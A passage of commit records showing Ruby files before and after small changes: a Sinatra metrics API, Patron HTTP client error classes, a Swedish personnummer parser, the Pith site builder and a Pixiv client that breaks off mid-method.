@metric = Metric.where(name: params[:metric]).order_by(:datetime.asc).last
respond_to do |wants|
wants.json { @metric.to_json }
wants.other { error_406 }
end
end
get '/metrics/:metric/:datetime' do
protected!
time = DateTime.parse(params[:datetime]) rescue error_400("'#{params[:datetime]}' is not a valid ISO8601 date/time.")
@metric = Metric.where(name: params[:metric], :datetime.lte => time).order_by(:datetime.asc).last
respond_to do |wants|
wants.json { @metric.to_json }
wants.other { error_406 }
end
end
get '/metrics/:metric/:from/:to' do
protected!
start_date = DateTime.parse(params[:from]) rescue nil
end_date = DateTime.parse(params[:to]) rescue nil
if params[:from] =~ /^P/
start_date = end_date - ISO8601::Duration.new(params[:from]).to_seconds.seconds rescue error_400("'#{params[:from]}' is not a valid ISO8601 duration.")
end
if params[:to] =~ /^P/
end_date = start_date + ISO8601::Duration.new(params[:to]).to_seconds.seconds rescue error_400("'#{params[:to]}' is not a valid ISO8601 duration.")
end
invalid = []
invalid << "'#{params[:from]}' is not a valid ISO8601 date/time." if start_date.nil? && params[:from] != "*"
invalid << "'#{params[:to]}' is not a valid ISO8601 date/time." if end_date.nil? && params[:to] != "*"
error_400(invalid.join(" ")) unless invalid.blank?
if start_date != nil && end_date != nil
error_400("'from' date must be before 'to' date.") if start_date > end_date
end
metrics = Metric.where(:name => params[:metric])
metrics = metrics.where(:datetime.gte => start_date) if start_date
metrics = metrics.where(:datetime.lte => end_date) if end_date
metrics = metrics.order_by(:datetime.asc)
data = {
:count => metrics.count,
:values => []
}
metrics.each do |metric|
data[:values] << {
:datetime => metric.datetime,
:value => metric.value,
:category => metric.category
}
end
respond_to do |wants|
wants.json { data.to_json }
wants.other { error_406 }
end
end
# start the server if ruby file executed directly
run! if app_file == $0
end
Tidying up
require 'sinatra'
require 'haml'
require 'mongoid'
require 'iso8601'
require 'dotenv'
require 'kramdown'
require 'rack/conneg'
require 'rack-google-analytics'
require_relative 'models/metrics'
require_relative 'pancreas-api/helpers'
require_relative 'pancreas-api/racks'
require_relative 'pancreas-api/errors'
Dotenv.load unless ENV['RACK_ENV'] == 'test'
Mongoid.load!(File.expand_path('../mongoid.yml', File.dirname(__FILE__)), ENV['RACK_ENV'])
class PancreasApi < Sinatra::Base
get '/' do
respond_to do |wants|
wants.html {
haml :index, :locals => {
:title => 'pancreas-api',
:text => 'pancreas-api',
:bootstrap_theme => '../lavish-bootstrap.css',
:github => {
:user => 'pikesley',
:project => 'HbA1c',
:ribbon => 'right_gray_6d6d6d'
}
}
}
wants.other { error_406 }
end
end
get '/metrics' do
protected!
data = {
"metrics" => Metric.all.distinct(:name).sort.map do |name|
{
name: name,
url: "https://#{request.host}/metrics/#{name}.json"
}
end
}
respond_to do |wants|
wants.json { data.to_json }
wants.other { error_406 }
end
end
post '/metrics/:metric' do
protected!
j = JSON.parse request.body.read
j[:name] = params[:metric]
# require 'pry'
# binding.pry
if Metric.where(:datetime => DateTime.parse(j["datetime"])).first
if Metric.where(:datetime => DateTime.parse(j["datetime"])).update(value: j["value"])
return 201
else
return 500
end
else
@metric = Metric.new j
if @metric.save
return 201
else
return 500
end
end
end
get '/metrics/:metric' do
protected!
@metric = Metric.where(name: params[:metric]).order_by(:datetime.asc).last
respond_to do |wants|
wants.json { @metric.to_json }
wants.other { error_406 }
end
end
get '/metrics/:metric/:datetime' do
protected!
time = DateTime.parse(params[:datetime]) rescue error_400("'#{params[:datetime]}' is not a valid ISO8601 date/time.")
@metric = Metric.where(name: params[:metric], :datetime.lte => time).order_by(:datetime.asc).last
respond_to do |wants|
wants.json { @metric.to_json }
wants.other { error_406 }
end
end
get '/metrics/:metric/:from/:to' do
protected!
start_date = DateTime.parse(params[:from]) rescue nil
end_date = DateTime.parse(params[:to]) rescue nil
if params[:from] =~ /^P/
start_date = end_date - ISO8601::Duration.new(params[:from]).to_seconds.seconds rescue error_400("'#{params[:from]}' is not a valid ISO8601 duration.")
end
if params[:to] =~ /^P/
end_date = start_date + ISO8601::Duration.new(params[:to]).to_seconds.seconds rescue error_400("'#{params[:to]}' is not a valid ISO8601 duration.")
end
invalid = []
invalid << "'#{params[:from]}' is not a valid ISO8601 date/time." if start_date.nil? && params[:from] != "*"
invalid << "'#{params[:to]}' is not a valid ISO8601 date/time." if end_date.nil? && params[:to] != "*"
error_400(invalid.join(" ")) unless invalid.blank?
if start_date != nil && end_date != nil
error_400("'from' date must be before 'to' date.") if start_date > end_date
end
metrics = Metric.where(:name => params[:metric])
metrics = metrics.where(:datetime.gte => start_date) if start_date
metrics = metrics.where(:datetime.lte => end_date) if end_date
metrics = metrics.order_by(:datetime.asc)
data = {
:count => metrics.count,
:values => []
}
metrics.each do |metric|
data[:values] << {
:datetime => metric.datetime,
:value => metric.value,
:category => metric.category
}
end
respond_to do |wants|
wants.json { data.to_json }
wants.other { error_406 }
end
end
# start the server if ruby file executed directly
run! if app_file == $0
end
|
## -------------------------------------------------------------------
##
## Patron HTTP Client: Error definitions
## Copyright (c) 2008 The Hive http://www.thehive.com/
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
## copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in
## all copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
## THE SOFTWARE.
##
## -------------------------------------------------------------------
module Patron
# Base class for Patron exceptions.
class Error < StandardError; end
# Gets raised when the URL passed to Patron used a protocol that it does not support.
# This most likely the result of a misspelled protocol string.
class UnsupportedProtocol < Error; end
# Gets raised when a request is attempted with an unsupported SSL version.
class UnsupportedSSLVersion < Error; end
# Gets raised when the URL was not properly formatted.
class URLFormatError < Error; end
# Gets raised when the remote host name could not be resolved.
class HostResolutionError < Error; end
# Gets raised when failing to connect to the remote host.
class ConnectionFailed < Error; end
# Gets raised when the response was shorter or larger than expected.
# This happens when the server first reports an expected transfer size,
# and then delivers data that doesn't match the previously given size.
class PartialFileError < Error; end
# Gets raised on an operation timeout. The specified time-out period was reached.
class TimeoutError < Error; end
# Gets raised on too many redirects. When following redirects, Patron hit the maximum amount.
class TooManyRedirects < Error; end
# Gets raised when the server specifies an encoding that could not be found, or has an invalid name,
# or when the server "lies" about the encoding of the response body (such as can be the case
# when the server specifies an encoding in `Content-Type`) which the HTML generator then overrides
# with a `meta` element.
class HeaderCharsetInvalid < Error; end
# Gets raised when you try to use `decoded_body` but it can't
# be represented by your Ruby process's current internal encoding
class NonRepresentableBody < HeaderCharsetInvalid; end
end
added declaration for UnsupportedHTTPVersion error exception
## -------------------------------------------------------------------
##
## Patron HTTP Client: Error definitions
## Copyright (c) 2008 The Hive http://www.thehive.com/
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
## copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in
## all copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
## THE SOFTWARE.
##
## -------------------------------------------------------------------
module Patron
# Base class for Patron exceptions.
class Error < StandardError; end
# Gets raised when the URL passed to Patron used a protocol that it does not support.
# This most likely the result of a misspelled protocol string.
class UnsupportedProtocol < Error; end
# Gets raised when a request is attempted with an unsupported SSL version.
class UnsupportedSSLVersion < Error; end
# Gets raised when a request is attempted with an unsupported HTTP version.
class UnsupportedHTTPVersion < Error; end
# Gets raised when the URL was not properly formatted.
class URLFormatError < Error; end
# Gets raised when the remote host name could not be resolved.
class HostResolutionError < Error; end
# Gets raised when failing to connect to the remote host.
class ConnectionFailed < Error; end
# Gets raised when the response was shorter or larger than expected.
# This happens when the server first reports an expected transfer size,
# and then delivers data that doesn't match the previously given size.
class PartialFileError < Error; end
# Gets raised on an operation timeout. The specified time-out period was reached.
class TimeoutError < Error; end
# Gets raised on too many redirects. When following redirects, Patron hit the maximum amount.
class TooManyRedirects < Error; end
# Gets raised when the server specifies an encoding that could not be found, or has an invalid name,
# or when the server "lies" about the encoding of the response body (such as can be the case
# when the server specifies an encoding in `Content-Type`) which the HTML generator then overrides
# with a `meta` element.
class HeaderCharsetInvalid < Error; end
# Gets raised when you try to use `decoded_body` but it can't
# be represented by your Ruby process's current internal encoding
class NonRepresentableBody < HeaderCharsetInvalid; end
end
|
# -*- encoding: utf-8 -*-
require 'date'
class Personnummer
# Public readonly attributes
attr_reader :born, :region, :control_digit
def initialize(number)
@valid = false
# Match the number
number = number.to_s
if number.match(/(?:18|19|20|21){0,1}(\d{2})(\d{2})(\d{2})([\-\+]{0,1})(\d{3})(\d{0,1})/)
# Calculate the control digit based on the birth date and serial number
@control_digit = luhn_algorithm("#{$~[1]}#{$~[2]}#{$~[3]}#{$~[5]}")
# Get the different parts of the number
year = $~[1].to_i
month = $~[2].to_i
day = $~[3].to_i
@divider = $~[4]
@serial = $~[5].to_i
# Set default divider if not present
if @divider.empty?
@divider = '-'
end
# Make the personnummer valid if the checksum is correct
@valid = true if @control_digit == $~[6].to_i && !$~[6].empty?
# Get the current date
today = Date.today
# Decide which century corresponds to the number
if year < (today.year-2000) && @divider == '-'
century = 2000
elsif year < (today.year-2000) && @divider == '+'
century = 1900
elsif @divider == '+'
century = 1800
else
century = 1900
end
# Get the date the person was born
@born = Date.parse("#{century+year}-#{month}-#{day}")
# Get the region name
@region = region_name(@serial)
# Check if the person is female based the serial (even == female)
@female = (@serial % 2 == 0)
else
raise ArgumentError.new, "The supplied personnummer is invalid"
end
end
def age
if Date.today > @born
(Date.today - @born).to_i/365
else
0
end
end
def to_s
"%s%s%03d%d" % [@born.strftime("%y%m%d"), @divider, @serial, @control_digit]
end
def valid?
@valid
end
def male?
!@female
end
def female?
@female
end
private
def luhn_algorithm(number)
multiplications = []
number.split(//).each_with_index do |digit, i|
if i % 2 == 0
multiplications << digit.to_i*2
else
multiplications << digit.to_i
end
end
sum = 0
multiplications.each do |number|
number.to_s.each_byte do |character|
sum += character.chr.to_i
end
end
if sum % 10 == 0
control_digit = 0
else
control_digit = (sum / 10 + 1) * 10 - sum
end
control_digit
end
def region_name(code)
# Don't return a region name if the person was born after 1990
# (When the previous region code was changed to a serial number)
if @born.year > 1990
return ''
end
case code
when 000..139 then 'Stockholms Län'
when 140..159 then 'Uppsala län'
when 160..189 then 'Södermanlands län'
when 190..239 then 'Östergötlands län'
when 240..269 then 'Jönköpings län'
when 270..289 then 'Kronobergs län'
when 290..319 then 'Kalmar län'
when 320..329 then 'Gotlands län'
when 330..349 then 'Blekinge län'
when 350..389 then 'Kristianstads län'
when 390..459 then 'Malmöhus län'
when 460..479 then 'Hallands län'
when 480..549 then 'Göteborgs och Bohus län'
when 550..589 then 'Älvsborgs län'
when 590..619 then 'Skaraborgs län'
when 620..649 then 'Värmlands län'
when 650..659 then 'Födda utomlands'
when 660..689 then 'Örebro län'
when 690..709 then 'Västmanlands län'
when 710..739 then 'Kopparbergs län'
when 750..779 then 'Gävleborgs län'
when 780..819 then 'Västernorrlands län'
when 820..849 then 'Jämtlands län'
when 850..889 then 'Västerbottens län'
when 890..929 then 'Norrbottens län'
when 930..999 then 'Födda utomlands eller utländska medborgare födda i Sverige'
end
end
end
Handle century if given
# -*- encoding: utf-8 -*-
require 'date'
class Personnummer
# Public readonly attributes
attr_reader :born, :region, :control_digit
def initialize(number)
@valid = false
# Match the number
number = number.to_s
if number.match(/(\d{2}){0,1}(\d{2})(\d{2})(\d{2})([\-\+]{0,1})(\d{3})(\d{0,1})/)
# Calculate the control digit based on the birth date and serial number
@control_digit = luhn_algorithm("#{$~[2]}#{$~[3]}#{$~[4]}#{$~[6]}")
# Get the different parts of the number
century = $~[1].to_i
year = $~[2].to_i
month = $~[3].to_i
day = $~[4].to_i
@divider = $~[5]
@serial = $~[6].to_i
# Set default divider if not present
if @divider.empty?
@divider = '-'
end
# Make the personnummer valid if the checksum is correct
@valid = true if @control_digit == $~[7].to_i && !$~[7].empty?
# Get the current date
today = Date.today
if century == 0
# Decide which century corresponds to the number
if year < (today.year-2000) && @divider == '-'
century = 2000
elsif year < (today.year-2000) && @divider == '+'
century = 1900
elsif @divider == '+'
century = 1800
else
century = 1900
end
else
century *= 100
end
# Get the date the person was born
@born = Date.parse("#{century+year}-#{month}-#{day}")
# Get the region name
@region = region_name(@serial)
# Check if the person is female based the serial (even == female)
@female = (@serial % 2 == 0)
else
raise ArgumentError.new, "The supplied personnummer is invalid"
end
end
def age
if Date.today > @born
(Date.today - @born).to_i/365
else
0
end
end
def to_s
"%s%s%03d%d" % [@born.strftime("%y%m%d"), @divider, @serial, @control_digit]
end
def valid?
@valid
end
def male?
!@female
end
def female?
@female
end
private
def luhn_algorithm(number)
multiplications = []
number.split(//).each_with_index do |digit, i|
if i % 2 == 0
multiplications << digit.to_i*2
else
multiplications << digit.to_i
end
end
sum = 0
multiplications.each do |number|
number.to_s.each_byte do |character|
sum += character.chr.to_i
end
end
if sum % 10 == 0
control_digit = 0
else
control_digit = (sum / 10 + 1) * 10 - sum
end
control_digit
end
def region_name(code)
# Don't return a region name if the person was born after 1990
# (When the previous region code was changed to a serial number)
if @born.year > 1990
return ''
end
case code
when 000..139 then 'Stockholms Län'
when 140..159 then 'Uppsala län'
when 160..189 then 'Södermanlands län'
when 190..239 then 'Östergötlands län'
when 240..269 then 'Jönköpings län'
when 270..289 then 'Kronobergs län'
when 290..319 then 'Kalmar län'
when 320..329 then 'Gotlands län'
when 330..349 then 'Blekinge län'
when 350..389 then 'Kristianstads län'
when 390..459 then 'Malmöhus län'
when 460..479 then 'Hallands län'
when 480..549 then 'Göteborgs och Bohus län'
when 550..589 then 'Älvsborgs län'
when 590..619 then 'Skaraborgs län'
when 620..649 then 'Värmlands län'
when 650..659 then 'Födda utomlands'
when 660..689 then 'Örebro län'
when 690..709 then 'Västmanlands län'
when 710..739 then 'Kopparbergs län'
when 750..779 then 'Gävleborgs län'
when 780..819 then 'Västernorrlands län'
when 820..849 then 'Jämtlands län'
when 850..889 then 'Västerbottens län'
when 890..929 then 'Norrbottens län'
when 930..999 then 'Födda utomlands eller utländska medborgare födda i Sverige'
end
end
end
|
require "logger"
require "pith/input"
require "pith/pathname_ext"
require "pith/reference_error"
require "tilt"
module Pith
class Project
DEFAULT_IGNORE_PATTERNS = ["_*", ".git", ".svn", "*~"].freeze
def initialize(attributes = {})
@ignore_patterns = DEFAULT_IGNORE_PATTERNS.dup
attributes.each do |k,v|
send("#{k}=", v)
end
end
attr_reader :input_dir
attr_reader :ignore_patterns
def input_dir=(dir)
@input_dir = Pathname(dir)
end
attr_reader :output_dir
def output_dir=(dir)
@output_dir = Pathname(dir)
end
attr_accessor :assume_content_negotiation
attr_accessor :assume_directory_index
# Public: get inputs
#
# Returns Pith::Input objects representing the files in the input_dir.
#
# The list of inputs is cached after first load;
# call #refresh to discard the cached data.
#
def inputs
@inputs ||= input_dir.all_files.map do |input_file|
path = input_file.relative_path_from(input_dir)
find_or_create_input(path)
end.compact
end
# Public: find an input.
#
# path - an path relative to either input_dir or output_dir
#
# Returns the first input whose input_path or output_path matches.
# Returns nil if no match is found.
#
def input(path)
path = Pathname(path)
inputs.each do |input|
return input if input.path == path || input.output_path == path
end
nil
end
# Public: build the project, generating output files.
#
def build
refresh
load_config
remove_old_outputs
output_dir.mkpath
generate_outputs
output_dir.touch
end
# Public: discard cached data that is out-of-sync with the file-system.
#
def refresh
@inputs = nil
@config_files = nil
end
# Public: check for errors.
#
# Returns true if any errors were encountered during the last build.
def has_errors?
@inputs.any?(&:error)
end
def last_built_at
output_dir.mtime
end
def logger
@logger ||= Logger.new(nil)
end
attr_writer :logger
def helpers(&block)
helper_module.module_eval(&block)
end
def helper_module
@helper_module ||= Module.new
end
def config_files
@config_files ||= begin
input_dir.all_files("_pith/**")
end.to_set
end
private
def load_config
config_file = input_dir + "_pith/config.rb"
project = self
if config_file.exist?
eval(config_file.read, binding, config_file.to_s, 1)
end
end
def remove_old_outputs
valid_output_paths = inputs.map { |i| i.output_path }
output_dir.all_files.each do |output_file|
output_path = output_file.relative_path_from(output_dir)
unless valid_output_paths.member?(output_path)
logger.info("removing #{output_path}")
FileUtils.rm(output_file)
end
end
end
def generate_outputs
inputs.each do |input|
input.build
end
end
def input_cache
@input_cache ||= Hash.new do |h, cache_key|
h[cache_key] = Input.new(self, cache_key.first)
end
end
def find_or_create_input(path)
file = input_dir + path
cache_key = [path, file.mtime]
input_cache[cache_key]
end
end
end
Simplify.
require "logger"
require "pith/input"
require "pith/pathname_ext"
require "pith/reference_error"
require "tilt"
module Pith
class Project
DEFAULT_IGNORE_PATTERNS = ["_*", ".git", ".svn", "*~"].freeze
def initialize(attributes = {})
@ignore_patterns = DEFAULT_IGNORE_PATTERNS.dup
attributes.each do |k,v|
send("#{k}=", v)
end
end
attr_reader :input_dir
attr_reader :ignore_patterns
def input_dir=(dir)
@input_dir = Pathname(dir)
end
attr_reader :output_dir
def output_dir=(dir)
@output_dir = Pathname(dir)
end
attr_accessor :assume_content_negotiation
attr_accessor :assume_directory_index
# Public: get inputs
#
# Returns Pith::Input objects representing the files in the input_dir.
#
# The list of inputs is cached after first load;
# call #refresh to discard the cached data.
#
def inputs
@inputs ||= input_dir.all_files.map do |input_file|
path = input_file.relative_path_from(input_dir)
find_or_create_input(path)
end.compact
end
# Public: find an input.
#
# path - an path relative to either input_dir or output_dir
#
# Returns the first input whose input_path or output_path matches.
# Returns nil if no match is found.
#
def input(path)
path = Pathname(path)
inputs.find do |input|
input.path == path || input.output_path == path
end
end
# Public: build the project, generating output files.
#
def build
refresh
load_config
remove_old_outputs
output_dir.mkpath
generate_outputs
output_dir.touch
end
# Public: discard cached data that is out-of-sync with the file-system.
#
def refresh
@inputs = nil
@config_files = nil
end
# Public: check for errors.
#
# Returns true if any errors were encountered during the last build.
def has_errors?
@inputs.any?(&:error)
end
def last_built_at
output_dir.mtime
end
def logger
@logger ||= Logger.new(nil)
end
attr_writer :logger
def helpers(&block)
helper_module.module_eval(&block)
end
def helper_module
@helper_module ||= Module.new
end
def config_files
@config_files ||= begin
input_dir.all_files("_pith/**")
end.to_set
end
private
def load_config
config_file = input_dir + "_pith/config.rb"
project = self
if config_file.exist?
eval(config_file.read, binding, config_file.to_s, 1)
end
end
def remove_old_outputs
valid_output_paths = inputs.map { |i| i.output_path }
output_dir.all_files.each do |output_file|
output_path = output_file.relative_path_from(output_dir)
unless valid_output_paths.member?(output_path)
logger.info("removing #{output_path}")
FileUtils.rm(output_file)
end
end
end
def generate_outputs
inputs.each do |input|
input.build
end
end
def input_cache
@input_cache ||= Hash.new do |h, cache_key|
h[cache_key] = Input.new(self, cache_key.first)
end
end
def find_or_create_input(path)
file = input_dir + path
cache_key = [path, file.mtime]
input_cache[cache_key]
end
end
end
|
module Pixiv
class Client
# A new agent
# @return [Mechanize::HTTP::Agent]
def self.new_agent
agent = Mechanize.new
agent.max_history = 1
agent.pluggable_parser['image/gif'] = Mechanize::Download
agent.pluggable_parser['image/jpeg'] = Mechanize::Download
agent.pluggable_parser['image/png'] = Mechanize::Download
agent
end
# @return [Mechanize::HTTP::Agent]
attr_reader :agent
# @return [Integer]
attr_reader :member_id
# A new instance of Client, logged in with the given credentials
# @overload initialize(pixiv_id, password)
# @param [String] pixiv_id
# @param [String] password
# @yield [agent] (optional) gives a chance to customize the +agent+ before logging in
# @overload initialize(agent)
# @param [Mechanize::HTTP::Agent] agent
# @return [Pixiv::Client]
def initialize(*args)
if args.size < 2
@agent = args.first || self.class.new_agent
yield @agent if block_given?
ensure_logged_in
else
pixiv_id, password = *args
@agent = self.class.new_agent
yield @agent if block_given?
login(pixiv_id, password)
end
end
# Log in to Pixiv
# @param [String] pixiv_id
# @param [String] password
def login(pixiv_id, password)
doc = agent.get("#{ROOT_URL}/index.php")
return if doc && doc.body =~ /logout/
form = doc.forms_with(action: '/login.php').first
puts doc.body and raise Error::LoginFailed, 'login form is not available' unless form
form.pixiv_id = pixiv_id
form.pass = password
doc = agent.submit(form)
raise Error::LoginFailed unless doc && doc.body =~ /logout/
@member_id = member_id_from_mypage(doc)
end
# @param [Integer] illust_id
# @return [Pixiv::Illust] illust bound to +self+
def illust(illust_id)
attrs = {illust_id: illust_id}
illust = Illust.lazy_new(attrs) { agent.get(Illust.url(illust_id)) }
illust.bind(self)
end
# @param [Integer] member_id
# @return [Pixiv::Member] member bound to +self+
def member(member_id = member_id)
attrs = {member_id: member_id}
member = Member.lazy_new(attrs) { agent.get(Member.url(member_id)) }
member.bind(self)
end
# @param [Pixiv::Member, Integer] member_or_member_id
# @param [Integer] page_num
# @return [Pixiv::IllustList]
def illust_list(member_or_member_id = member_id, page_num = 1)
page_list_with_class(IllustList, member_or_member_id, page_num)
end
# @param [Pixiv::Member, Integer] member_or_member_id
# @param [Integer] page_num
# @return [Pixiv::BookmarkList]
def bookmark_list(member_or_member_id = member_id, page_num = 1)
page_list_with_class(BookmarkList, member_or_member_id, page_num)
end
# (see #bookmark_list)
# @return [Pixiv::PrivateBookmarkList]
def private_bookmark_list(member_or_member_id = member_id, page_num = 1)
bookmark_list_with_class(PrivateBookmarkList, member_or_member_id, page_num)
end
# @param [Pixiv::BookmarkList, Pixiv::Member, Integer] list_or_member
# @param [Hash] opts
# @option opts [Boolean] :include_deleted (false)
# whether the returning enumerator yields deleted illust as +nil+ or not
# @return [Pixiv::PageCollection::Enumerator]
def illusts(list_or_member, opts = {})
pages_with_class(IllustList, list_or_member, opts)
end
# (see #illusts)
def bookmarks(list_or_member, opts = {})
pages_with_class(BookmarkList, list_or_member, opts)
end
# (see #illusts)
def private_bookmarks(list_or_member = member_id, opts = {})
it = list_or_member
if it.is_a?(BookmarkList) && !it.is_a?(PrivateBookmarkList)
raise ArgumentError, 'list is not private'
end
if it.is_a?(BookmarkList) && it.member_id != member_id
raise ArgumentError, 'list is not mine'
end
if it.is_a?(Member) && it.id != member_id
raise ArgumentError, 'member is not me'
end
if it.is_a?(Integer) && it != member_id
raise ArgumentError, 'member is not me'
end
pages_with_class(PrivateBookmarkList, it, opts)
end
# Downloads the image to +io_or_filename+
# @param [Pixiv::Illust] illust
# @param [#write, String, Array<String, Symbol, #call>] io_or_filename io or filename or pattern (see {#filename_from_pattern})
# @param [Symbol] size image size (+:small+, +:medium+, or +:original+)
def download_illust(illust, io_or_filename, size = :original)
size = {:s => :small, :m => :medium, :o => :original}[size] || size
url = illust.__send__("#{size}_image_url")
referer = case size
when :small then nil
when :medium then illust.url
when :original then illust.original_image_referer
else raise ArgumentError, "unknown size `#{size}`"
end
save_to = io_or_filename
if save_to.is_a?(Array)
save_to = filename_from_pattern(save_to, illust, url)
end
FileUtils.mkdir_p(File.dirname(save_to)) unless save_to.respond_to?(:write)
@agent.download(url, save_to, [], referer)
end
# Downloads the images to +pattern+
# @param [Pixiv::Illust] illust the manga to download
# @param [Array<String, Symbol, #call>] pattern pattern (see {#filename_from_pattern})
# @note +illust#manga?+ must be +true+
# @todo Document +&block+
def download_manga(illust, pattern, &block)
action = DownloadActionRegistry.new(&block)
illust.original_image_urls.each_with_index do |url, n|
begin
action.before_each.call(url, n) if action.before_each
filename = filename_from_pattern(pattern, illust, url)
FileUtils.mkdir_p(File.dirname(filename))
@agent.download(url, filename, [], illust.original_image_referer)
action.after_each.call(url, n) if action.after_each
rescue
action.on_error ? action.on_error.call($!) : raise
end
end
end
# Generate filename from +pattern+ in context of +illust+ and +url+
#
# @api private
# @param [Array<String, Symbol, #call>] pattern
# @param [Pixiv::Illust] illust
# @param [String] url
# @return [String] filename
#
# The +pattern+ is an array of string, symbol, or object that responds to +#call+.
# Each component of the +pattern+ is replaced by the following rules and then
# the +pattern+ is concatenated as the returning +filename+.
#
# * +:image_name+ in the +pattern+ is replaced with the base name of the +url+
# * Any other symbol is replaced with the value of +illust.__send__(the_symbol)+
# * +#call+-able object is replaced with the value of +the_object.call(illust)+
# * String is left as-is
def filename_from_pattern(pattern, illust, url)
pattern.map {|i|
if i == :image_name
name = File.basename(url)
if name =~ /\.(\w+)\?\d+$/
name += '.' + $1
end
name
elsif i.is_a?(Symbol) then illust.__send__(i)
elsif i.respond_to?(:call) then i.call(illust)
else i
end
}.join('')
end
protected
def page_list_with_class(list_class, member_or_member_id, page_num = 1)
it = member_or_member_id
member_id = it.is_a?(Member) ? it.member_id : it
attrs = {member_id: member_id, page_num: page_num}
list_class.lazy_new(attrs) {
agent.get(list_class.url(member_id, page_num))
}
end
def pages_with_class(list_class, list_or_member, opts = {})
if list_or_member.is_a?(list_class)
list = list_or_member
else
list = page_list_with_class(list_class, list_or_member)
end
PageCollection::Enumerator.new(self, list, !!opts[:include_deleted])
end
def ensure_logged_in
doc = agent.get("#{ROOT_URL}/mypage.php")
raise Error::LoginFailed unless doc.body =~ /logout/
@member_id = member_id_from_mypage(doc)
end
def member_id_from_mypage(doc)
doc.at('.profile_area a')['href'].match(/(\d+)$/).to_a[1].to_i
end
end
# @private
class DownloadActionRegistry
def initialize(&block)
instance_eval(&block) if block
end
def before_each(&block)
block ? (@before_each = block) : @before_each
end
def after_each(&block)
block ? (@after_each = block) : @after_each
end
def on_error(&block)
block ? (@on_error = block) : @on_error
end
end
end
Tweak documentation
module Pixiv
class Client
# A new agent
# @return [Mechanize::HTTP::Agent]
def self.new_agent
agent = Mechanize.new
agent.max_history = 1
agent.pluggable_parser['image/gif'] = Mechanize::Download
agent.pluggable_parser['image/jpeg'] = Mechanize::Download
agent.pluggable_parser['image/png'] = Mechanize::Download
agent
end
# @return [Mechanize::HTTP::Agent]
attr_reader :agent
# @return [Integer]
attr_reader :member_id
# A new instance of Client, logged in with the given credentials
# @overload initialize(pixiv_id, password)
# @param [String] pixiv_id
# @param [String] password
# @yield [agent] (optional) gives a chance to customize the +agent+ before logging in
# @overload initialize(agent)
# @param [Mechanize::HTTP::Agent] agent
# @return [Pixiv::Client]
def initialize(*args)
if args.size < 2
@agent = args.first || self.class.new_agent
yield @agent if block_given?
ensure_logged_in
else
pixiv_id, password = *args
@agent = self.class.new_agent
yield @agent if block_given?
login(pixiv_id, password)
end
end
# Log in to Pixiv
# @param [String] pixiv_id
# @param [String] password
def login(pixiv_id, password)
doc = agent.get("#{ROOT_URL}/index.php")
return if doc && doc.body =~ /logout/
form = doc.forms_with(action: '/login.php').first
puts doc.body and raise Error::LoginFailed, 'login form is not available' unless form
form.pixiv_id = pixiv_id
form.pass = password
doc = agent.submit(form)
raise Error::LoginFailed unless doc && doc.body =~ /logout/
@member_id = member_id_from_mypage(doc)
end
# @param [Integer] illust_id
# @return [Pixiv::Illust] illust bound to +self+
def illust(illust_id)
attrs = {illust_id: illust_id}
illust = Illust.lazy_new(attrs) { agent.get(Illust.url(illust_id)) }
illust.bind(self)
end
# @param [Integer] member_id
# @return [Pixiv::Member] member bound to +self+
def member(member_id = member_id)
attrs = {member_id: member_id}
member = Member.lazy_new(attrs) { agent.get(Member.url(member_id)) }
member.bind(self)
end
# @param [Pixiv::Member, Integer] member_or_member_id
# @param [Integer] page_num
# @return [Pixiv::IllustList]
def illust_list(member_or_member_id = member_id, page_num = 1)
page_list_with_class(IllustList, member_or_member_id, page_num)
end
# @param [Pixiv::Member, Integer] member_or_member_id
# @param [Integer] page_num
# @return [Pixiv::BookmarkList]
def bookmark_list(member_or_member_id = member_id, page_num = 1)
page_list_with_class(BookmarkList, member_or_member_id, page_num)
end
# @param [Pixiv::Member, Integer] member_or_member_id
# @param [Integer] page_num
# @return [Pixiv::PrivateBookmarkList]
def private_bookmark_list(member_or_member_id = member_id, page_num = 1)
bookmark_list_with_class(PrivateBookmarkList, member_or_member_id, page_num)
end
# @param [Pixiv::BookmarkList, Pixiv::Member, Integer] list_or_member
# @param [Hash] opts
# @option opts [Boolean] :include_deleted (false)
# whether the returning enumerator yields deleted illust as +nil+ or not
# @return [Pixiv::PageCollection::Enumerator]
def illusts(list_or_member, opts = {})
pages_with_class(IllustList, list_or_member, opts)
end
# (see #illusts)
def bookmarks(list_or_member, opts = {})
pages_with_class(BookmarkList, list_or_member, opts)
end
# (see #illusts)
def private_bookmarks(list_or_member = member_id, opts = {})
it = list_or_member
if it.is_a?(BookmarkList) && !it.is_a?(PrivateBookmarkList)
raise ArgumentError, 'list is not private'
end
if it.is_a?(BookmarkList) && it.member_id != member_id
raise ArgumentError, 'list is not mine'
end
if it.is_a?(Member) && it.id != member_id
raise ArgumentError, 'member is not me'
end
